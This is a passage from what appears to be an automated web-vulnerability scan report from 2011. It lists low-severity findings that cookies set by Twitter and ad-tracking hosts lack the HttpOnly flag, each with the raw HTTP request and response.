Cookie: uid=uid=888a2c66-6932-11e0-8830-001b24783b20&_hmacv=1&_salt=4113190855&_keyid=k1&_hmac=2bd08a6ff17f1fdebe5379daa4d53c1f64bef7b8; pv1="b!!!!-!#3yC!,Y+@!$Xwq!1`)_!%bq`!!!!$!?5%!$U=A2!w1K*!%4fo!$k7.!'pCX~~~~~<wYiT=#mS_~!!J<[!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<y-(rM.jTN!!L7_!,M,<!$LQ^!,+Z*!$%hK~!#1g.)di=:!ZmB)!%mdT!$hK:~~~~~~<xl/w<yjn9M.jTN!#mP:!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mP>!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPA!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPD!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPG!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#mPJ!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<y5UM!!!#G!#p!r!!#f?!#>u3!1Z!K!%au=!!!!$!?5%!'jyc4!wVd.!$Tvl!#SxE!'o2l~~~~~<xt]R<xtrb!!.vL"; ih="b!!!!>!)Tt+!!!!#<wYoD!)`Tm!!!!#<vmX7!)`Tq!!!!#<vmX5!)`U6!!!!#<vmX0!*loT!!!!#<vl)_!,+Z*!!!!$<xl/w!/Iw4!!!!#<wF]1!/U5t!!!!#<xu,P!/YG?!!!!#<xt+b!/_KY!!!!#<vl)T!/h[p!!!!#<vl)[!/iq6!!!!$<vmX=!/iq@!!!!$<vm`!!/iqB!!!!#<vmTN!/iqH!!!!#<vmTH!0ji6!!!!'<xqS_!0ji7!!!!%<xqRm!1EYJ!!!!#<wUv<!1M!9!!!!$<wF]9!1NgF!!!!#<xt,P!1Z!K!!!!#<xt]R!1`)_!!!!#<wYiT!1kC+!!!!%<xqSY!1kC5!!!!#<xqR`!1kC<!!!!#<xqQb!1kDI!!!!#<xqQM"; bh="b!!!%1!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tP)~~!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V!!!!#<x31-!#5(W!!!!#<x3.t!#5([!!!!#<x,:<!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#_0B!!!!#<xE(*!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m!!!!#<x3.t!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G!!!!#<x3.t!#b?y!!!!#<xE(*!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c%+!!!!#<xE(*!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; BX=8khj7j56qmjsh&b=4&s=dk&t=106

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:12:08 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%0!!!?H!!!!%<wR0_!!*oY!!!!#<xqZB!!-?2!!!!*<xqZB!!-G2!!!!$<w[UB!!-yu!!!!.<vm`$!!.+B!!!!.<vm`%!!.tS!!!!$<xqZB!!0O4!!!!(<xt]T!!0O<!!!!-<xt]T!!0P,!!!!#<x4hf!!1Mv!!!!#<waw+!!2(j!!!!/<whqI!!4Qs!!!!%<wle3!!?VS!!B1c<xl.o!!J<=!!!!.<xt]T!!J<E!!!!.<xt]T!!J>I!!!!#<x)TA!!L(^!!!!$<xD>X!!LHY!!!!.<whoV!!L[f!!!!#<wYl+!!ONX!!!!#<wle$!!ObA!!!!$<xqZB!!PL`!!!!#<x@jG!!RZ(!!!!)<xt,H!!VQ(!!!!#<wYkr!!dNP!!!!%<x+rS!!g5o!!!!'<wsq+!!iV_!!!!%<wsq-!!i[%!!!!#<x4hf!!ita!!!!/<xt]T!!q:E!!!!,<xt]T!!q<+!!!!-<xt]T!!q</!!!!-<xt]T!!q<3!!!!-<xt]T!!r^4!!!!(<x+rV!!r^5!!!!#<x*ig!!tjQ!!!!$<xqZB!!ucq!!!!-<xt]T!!vRm!!!!(<xt]T!!vRq!!!!(<xt]T!!vRr!!!!(<xt]T!!vRw!!!!-<xt]T!!vRx!!!!(<xt]T!!vRy!!!!(<xt]T!!w3l!!!!$<xqZB!!wQ3!!!!$<xqZB!!wQ5!!!!$<xqZB!!wcu!!!!#<xCAG!!wq:!!!!#<xCAF!!xX$!!!!#<x(sS!!xX+!!!!#<x(rt!!y!r!!!!(<xt]T!##^t!!!!#<wYoF!#'uj!!!!#<wsgD!#*Xc!!!!#<xE(*!#+<r!!!!#<wO:5!#+di!!!!#<xYi<!#+dj!!!!#<xYi<!#+dk!!!!#<xYi<!#-B#!!!!#<wsXA!#-H0!!!!#<wleD!#.dO!!!!+<xt,H!#27)!!!!+<x+rW!#2RS!!!!#<x9#3!#2Rn!!!!#<x2wq!#2XY!!!!(<xt]U!#2YX!!!!#<vl)_!#3>J!!!!#<x(U)!#3g6!!!!#<w>/l!#3pS!!!!#<x31-!#3pv!!!!#<wsXA!#44f!!!!(<xt]T!#48w!!2s=<xrZD!#4`K!!!!#<x2wq!#5(U!!!!#<x,:<!#5(V~~!#5(W~~!#5([~~!#5(^!!!!#<x31-!#5(a!!!!#<x3.t!#5[N!!!!#<vl)_!#5kt!!!!#<x)TA!#5nZ!!!!(<xt]T!#7.'!!!!(<xt]T!#7.:!!!!(<xt]T!#7.O!!!!(<xt]T!#8>*!!!!#<x2wq!#8Mo!!!!#<wle%!#8tG!!!!#<wsq,!#=-g!!!!#<xi5p!#KjQ!!B1c<xl.o!#Km.!!!!#<xl.y!#Km/!!!!#<xl/o!#L]q!!!!#<w>/s!#MHv!!!!$<w>/n!#MTC!!!!(<xt]T!#MTF!!!!(<xt]T!#MTH!!!!(<xt]T!#MTI!!!!(<xt]T!#MTJ!!!!(<xt]T!#MTK!!!!#<w>/m!#M]c!!!!)<xt,H!#Mr7!!!!#<w>/l!#N44!!!!#<x2wq!#N45!!!!#<xr]M!#O>d!!C`.<xrYg!#RY.!!!!'<xt,H!#SCj!!!!+<xt,H!#SCk!!!!+<xt,H!#SEm!!!!.<xt]T!#SF3!!!!.<xt]T!#T,d!!!!#<wsXA!#T8R!!!!#<x+I0!#TnE!!!!(<xt]T!#UDP!!!!.<xt]T!#U_(!!!!*<wleI!#V7#!!!!#<x,:<!#V8a!!!!#<xq_s!#VEP!!!!#<wleE!#VO3!!!!#<xq_q!#Wb^!!C`.<xrYg!#X8Y!!!!#<xr]M!#XI8!!!!#<xL%*!#YCg!!!!#<x2wq!#ZBw!!!!'<xt,H!#[L>!!!!%<w[UA!#]%`!!!!$<xtBW!#]=P!!!!#<xr]Q!#]@s!!!!%<whqH!#]W%!!!!'<xt,H!#^@9!!!!#<x2wq!#^bt!!!!%<xr]Q!#^d6!!!!$<xtBW!#_0B~~!#`S2!!!!$<xqZB!#`U0!!!!#<xqZB!#a'?!!!!#<w>/m!#a=6!!!!#<xqZB!#a=7!!!!#<xqZB!#a=9!!!!#<xqZB!#a=P!!!!#<xqZB!#aCq!!!!(<w[U@!#aG>!!!!+<xt,H!#ah!!!!!(<xt]T!#ai7!!!!(<xt]T!#ai?!!!!(<xt]T!#b.n!!!!#<xE(*!#b:Z!!!!#<x2wq!#b<Z!!!!#<x3.t!#b<_!!!!#<x3.t!#b<`!!!!#<x,:<!#b<a!!!!#<x,:<!#b<m~~!#b='!!!!#<x3.t!#b=(!!!!#<x,:<!#b=*!!!!#<x,:<!#b=E!!!!#<x31-!#b=F!!!!#<x3.t!#b=G~~!#b?y~~!#b@%!!!!#<wsXA!#bGi!!!!#<xr]M!#c%+~~!#c-u!!!!-<w*F]!#c?c!!!!(<xt]T!#ddE!!!!#<xYi>!#e(g!!!!#<xE(*!#ePa!!!!#<xr]M!#e`Y!!!!#<xr]Q!#eaO!!!!+<xt,H!#ec)!!!!%<x+rF!#fG+!!!!#<xqZB!#g,F!!!!#<xr]Q!#gHm!!!!'<xt,H!#g[h!!!!'<xt,H!#g]5!!!!)<xdAS!#gig!!!!#<xt+`!#gsr!!!!#<x2wq!#k]4!!!!#<x2wq!#mP5!!!!$<w[UB!#mP6!!!!$<w[UB!#ni8!!!!#<x*cS!#p#H!!!!'<xt,H!#p6E!!!!%<wleK!#p6Z!!!!#<wle8!#p]R!!!!#<wsXA!#p]T!!!!#<wsXA!#q),!!!!#<wO:5!#q2T!!!!.<whoV!#q2U!!!!.<whoV!#q9]!!!!#<waw+!#qx3!!!!#<wGkF!#qx4!!!!#<wGk*!#r:A!!!!#<waw,!#r<X!!!!#<x+I@!#rVR!!!!(<xt]T!#sAb!!!!#<x3XJ!#sAc!!!!#<x3XJ!#sC4!!!!#<x3XJ!#sax!!!!#<xd-C!#tLy!!!!(<xt]T!#tM)!!!!(<xt]T!#tn2!!!!(<xt]T!#uE=!!!!#<x9#K!#uJY!!!!.<xt]T!#ust!!!!+<xt,H!#usu!!!!+<xt,H!#v,Y!!!!#<x2wq!#v,Z!!!!#<xt>i!#vyX!!!!(<xt]T!#w!v!!!!#<wsXA!#wGj!!!!#<wle$!#wGm!!!!#<wle$!#wW9!!!!+<xt,H!#wnK!!!!)<xt,H!#wnM!!!!)<xt,H!#wot!!!!#<xt>i!#xI*!!!!+<xt,H!#xIF!!!!+<xt]T!#yM#!!!!+<xt,H!#yX.!!!!9<w*F[!$!!1!!!!'<xt,H!$!4(!!!!'<xt,H!$!4D!!!!'<xt,H!$!8/!!!!#<xl.y!$!89!!!!'<xt,H!$!8o!!!!'<xt,H!$!:w!!!!#<x2wq!$!:x!!!!#<xr]M!$!>x!!!!*<wjBg!$#3q!!!!(<x+Z1!$#Fi!!!!'<xt,H!$#G4!!!!'<xt,H!$#M.!!!!'<xt,H!$#R7!!!!(<xt]T!$#T!!!!!'<xt,H!$#T3!!!!'<xt,H!$#WA!!!!+<xt,H!$$K<!!!!$<wleJ!$$L.!!!!#<w[Sh!$$L/!!!!#<w[Sh!$$L0!!!!#<w[Sh!$$LE!!!!#<w[_a!$$LL!!!!$<w[_f!$$R]!!!!#<xl/)!$$j2!!!!#<xKwk!$$p*!!!!#<wUv4!$%,!!!!!+<xt,H!$%,J!!!!#<x2wq!$%SB!!!!+<xt,H!$%Uy!!!!#<w>/l!$%c]!!!!'<xt,H!$'/1!!!!#<wx=%!$'Z-!!!!(<xt]T!$(!P!!!!$<xqZB!$(+N!!!!#<wGkB!$(>p!!!!'<xt,H!$(Gt!!!!+<xt]T!$(Qs!!!!'<xt,H!$(V0!!!!%<y*E<!$)>0!!!!#<xqaf!$)DE!!!!#<xr]M!$)DI!!!!#<x2wq!$)GB!!!!$<xqZB!$*Q<!!!!'<xt,H!$*R!!!!!%<xr]Q!$*a0!!!!'<xt,H!$*bX!!!!#<xr]Q"; path=/; expires=Fri, 03-May-2013 01:12:08 GMT
Set-Cookie: BX=8khj7j56qmjsh&b=4&s=dk&t=106; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Wed, 04 May 2011 01:12:08 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

15.84. http://api.twitter.com/1/statuses/user_timeline.json  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /1/statuses/user_timeline.json

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1/statuses/user_timeline.json?screen_name=BurtGoldman&callback=TWTR.Widget.receiveCallback_1&include_rts=true&count=5&clientsource=TWITTERINC_WIDGET&1304488441548=cachebust HTTP/1.1
Host: api.twitter.com
Proxy-Connection: keep-alive
Referer: http://www.quantumjumping.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: guest_id=130314166807091166; __utmz=43838368.1303561994.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=43838368.551233229.1303561994.1303561994.1303568398.2

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:54:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1304470443-61830-19084
X-RateLimit-Limit: 150
ETag: "dd68325e1e1b5638c5389e4667a03d55"-gzip
Last-Modified: Wed, 04 May 2011 00:54:03 GMT
X-RateLimit-Remaining: 148
X-Runtime: 0.03865
X-Transaction-Mask: a6183ffa5f8ca943ff1b53b5644ef114cafd8234
Content-Type: application/json; charset=utf-8
Pragma: no-cache
X-RateLimit-Class: api
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
X-MID: 66b24857cdd9bcac2a95764546ecce88dea50cec
X-RateLimit-Reset: 1304474043
Set-Cookie: k=173.193.214.243.1304470443781224; path=/; expires=Wed, 11-May-11 00:54:03 GMT; domain=.twitter.com
Set-Cookie: original_referer=ZLhHHTiegr%2FtFJS817TPehDfOh7Oz%2FB4ymznqD0OvVyy7XSdf6Js7w%3D%3D; path=/
Set-Cookie: _twitter_sess=BAh7CDoPY3JlYXRlZF9hdGwrCAxXf7gvAToHaWQiJWUyZjE0MDNlMDAzMWRk%250AMTkyYThiYjdkYTZmMTg0ZGJhIgpmbGFzaElDOidBY3Rpb25Db250cm9sbGVy%250AOjpGbGFzaDo6Rmxhc2hIYXNoewAGOgpAdXNlZHsA--b0bc3bdcb0dce34b76541769069a6e9c050baa72; domain=.twitter.com; path=/; HttpOnly
Vary: Accept-Encoding
Connection: close
Content-Length: 9192

TWTR.Widget.receiveCallback_1([{"text":"Energy and Healing \u201cDear Burt\u201d Volume 81 http:\/\/bit.ly\/lZE1j8","truncated":false,"place":null,"coordinates":null,"favorited":false,"id_str":"638961
...[SNIP]...

15.85. http://b.scorecardresearch.com/b  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=1187239486&c7=http%3A%2F%2Fnews.cnet.com%2Fwebware%2F&c8=Webware%20-%20Cool%20Web%20apps%20for%20everyone%20-%20CNET&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/webware/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=25894b9d-24.143.206.177-1303083414

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 04 May 2011 01:28:53 GMT
Connection: close
Set-Cookie: UID=25894b9d-24.143.206.177-1303083414; expires=Fri, 03-May-2013 01:28:53 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS


15.86. http://cspix.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.truewoman.com%2f%3fid%3d1369 HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh41.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=014020a0g0h1ljtllpxzt1rw0fxzt1rw0fxzt1tzu; adh=1lkkxr816014qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh0rw0f00u3e0g0j0g50g; rdrlst=41j157rlklhm4000000013e0115smlkb5u20000000k3e0g15sklkkpqq000000093e090hsnlkb5u20000000k3e0g0m7alkkxrb000000063e060x1blkkpqq000000093e090hsplkkpqq000000093e090m7flkkyyl000000043e0412gdlkkyy0000000053e050morlkkxrb000000063e061196lkkkbe0000000f3e0f1195lkkpqh0000000a3e0a1194lkkjj40000000g3e0g0dlxlkb5u20000000k3e0g0znmlk34620000000p3e0g140rlkb5u20000000k3e0g1193lkkplo0000000c3e0c008slklhm4000000013e010p46lkkpqq000000093e091192lkkpke0000000e3e0e10tylkkpku0000000d3e0d0p1blkb5u20000000k3e0g0moylkl0r5000000023e020zr4lkb5u20000000k3e0g00bvlk9pe80000000l3e0g15xylk60qe0000000o3e0g10poljyxb40000000r3e0g0e6llkl0r5000000023e0210telkd7nq0000000j3e0g0c9slk9pe80000000l3e0g10rdlkdkly0000000h3e0g0mj2lkkxrb000000063e06159olk8fax0000000m3e0g0kualkkpqq000000093e090m0ulkl0r5000000023e020m45lkl0r5000000023e020m0plkkxrb000000063e060m40lkkxrb000000063e060mjelkkxrb000000063e0612qnlkkplt0000000b3e0b167blkl0r5000000023e020bo8lkb5u20000000k3e0g0mjjlkl0r5000000023e021672lkkxrb000000063e060lw5lkb5u20000000k3e0g0zaalkb5u20000000k3e0g13bolk7p6z0000000n3e0g1203lkb5u20000000k3e0g1204lkkyy0000000053e05137rlkkpqq000000093e09137qlkb5u20000000k3e0g0afqlkb5u20000000k3e0g0o0vlkkpqx000000083e080z2ilkkxrb000000063e060ni1lkb5u20000000k3e0g; sglst=20p0sc80lkb5u209jqc0063e000j00500ag2lkd7nq089ye00j3e0g0j0g50gc81lkkpke0000000e3e0e0j0e50ea6slkkpke0000000e3e0e0j0e50e9rslkkpke00s1q00e3e0e0j0e50eam5lkkxr8002zw0073e070j075070kllklhm4000000013e010j015019q5lkb5u20abs200k3e0g0j0g50gdgflkkpke00s1q00e3e0e0j0e50e0t7ljyxb40mkb000r3e0g0j0g50gbo0lkb5u209jqc00k3e0g0j0g50gbo1lkkyy000io40053e050j05505aoplkb5u209jqc0063e000j00500d86lklhm4000000013e010j01501942lkb5u20abs200k3e0g0j0g50g8ndlkb5u20abs200k3e0g0j0g50g719lkb5u209jqc0063e000j0050071alkkpke00s1q00e3e0e0j0e50e56blkb5u20abs200k3e0g0j0g50gasulkb5u209jqc0063e000j00500dgilkb5u209jqc0063e000j005004wclkb5u209jqc0063e000j005008eklkkpke00s1q00e3e0e0j0e50e5mrlkb5u20abs200k3e0g0j0g50gbwjlkkyy000io40053e050j05505; vstcnt=417k010r074fduc118e10a24f7qr118e10822te10tq10a24uzg6118e10023sti11hj10a24fgv9118e10824eflo118e1042

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: acs=014020a0g0h1ljtllpxzt1tr38xzt1tr38xzt1tr38; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: adh=1lkkxr816014qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: clid=2ljtllp01170xrd52zkwjuxh0tr3800v3f010j0h50h; Domain=media6degrees.com; Expires=Mon, 31-Oct-2011 01:12:33 GMT; Path=/
Set-Cookie: orblb=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rdrlst=421157rlklhm4000000023f01157olkncox000000013f0115hnlkncox000000013f0115smlkb5u20000000l3f0115sklkkpqq0000000a3f010hsnlkb5u20000000l3f010m7alkkxrb000000073f010x1blkkpqq0000000a3f010hsplkkpqq0000000a3f010m7flkkyyl000000053f0112gdlkkyy0000000063f010morlkkxrb000000073f0114rzlkncox000000013f011196lkkkbe0000000g3f011195lkkpqh0000000b3f011194lkkjj40000000h3f0115azlkncox000000013f010dlxlkb5u20000000l3f0114hplkncox000000013f0114helkncox000000013f010znmlk34620000000q3f011193lkkplo0000000d3f011192lkkpke0000000f3f010p46lkkpqq0000000a3f01008slklhm4000000023f010moylkl0r5000000033f010p1blkb5u20000000l3f0110tylkkpku0000000e3f010zr4lkb5u20000000l3f0100bvlk9pe80000000m3f0115xylk60qe0000000p3f0110poljyxb40000000s3f010e6llkl0r5000000033f0110telkd7nq0000000k3f0113uglkncox000000013f010c9slk9pe80000000m3f0113rclkncox000000013f0110rdlkdkly0000000i3f0115j8lkncox000000013f010mj2lkkxrb000000073f01159olk8fax0000000n3f010kualkkpqq0000000a3f010m0ulkl0r5000000033f01163rlkncox000000013f011517lkncox000000013f010m45lk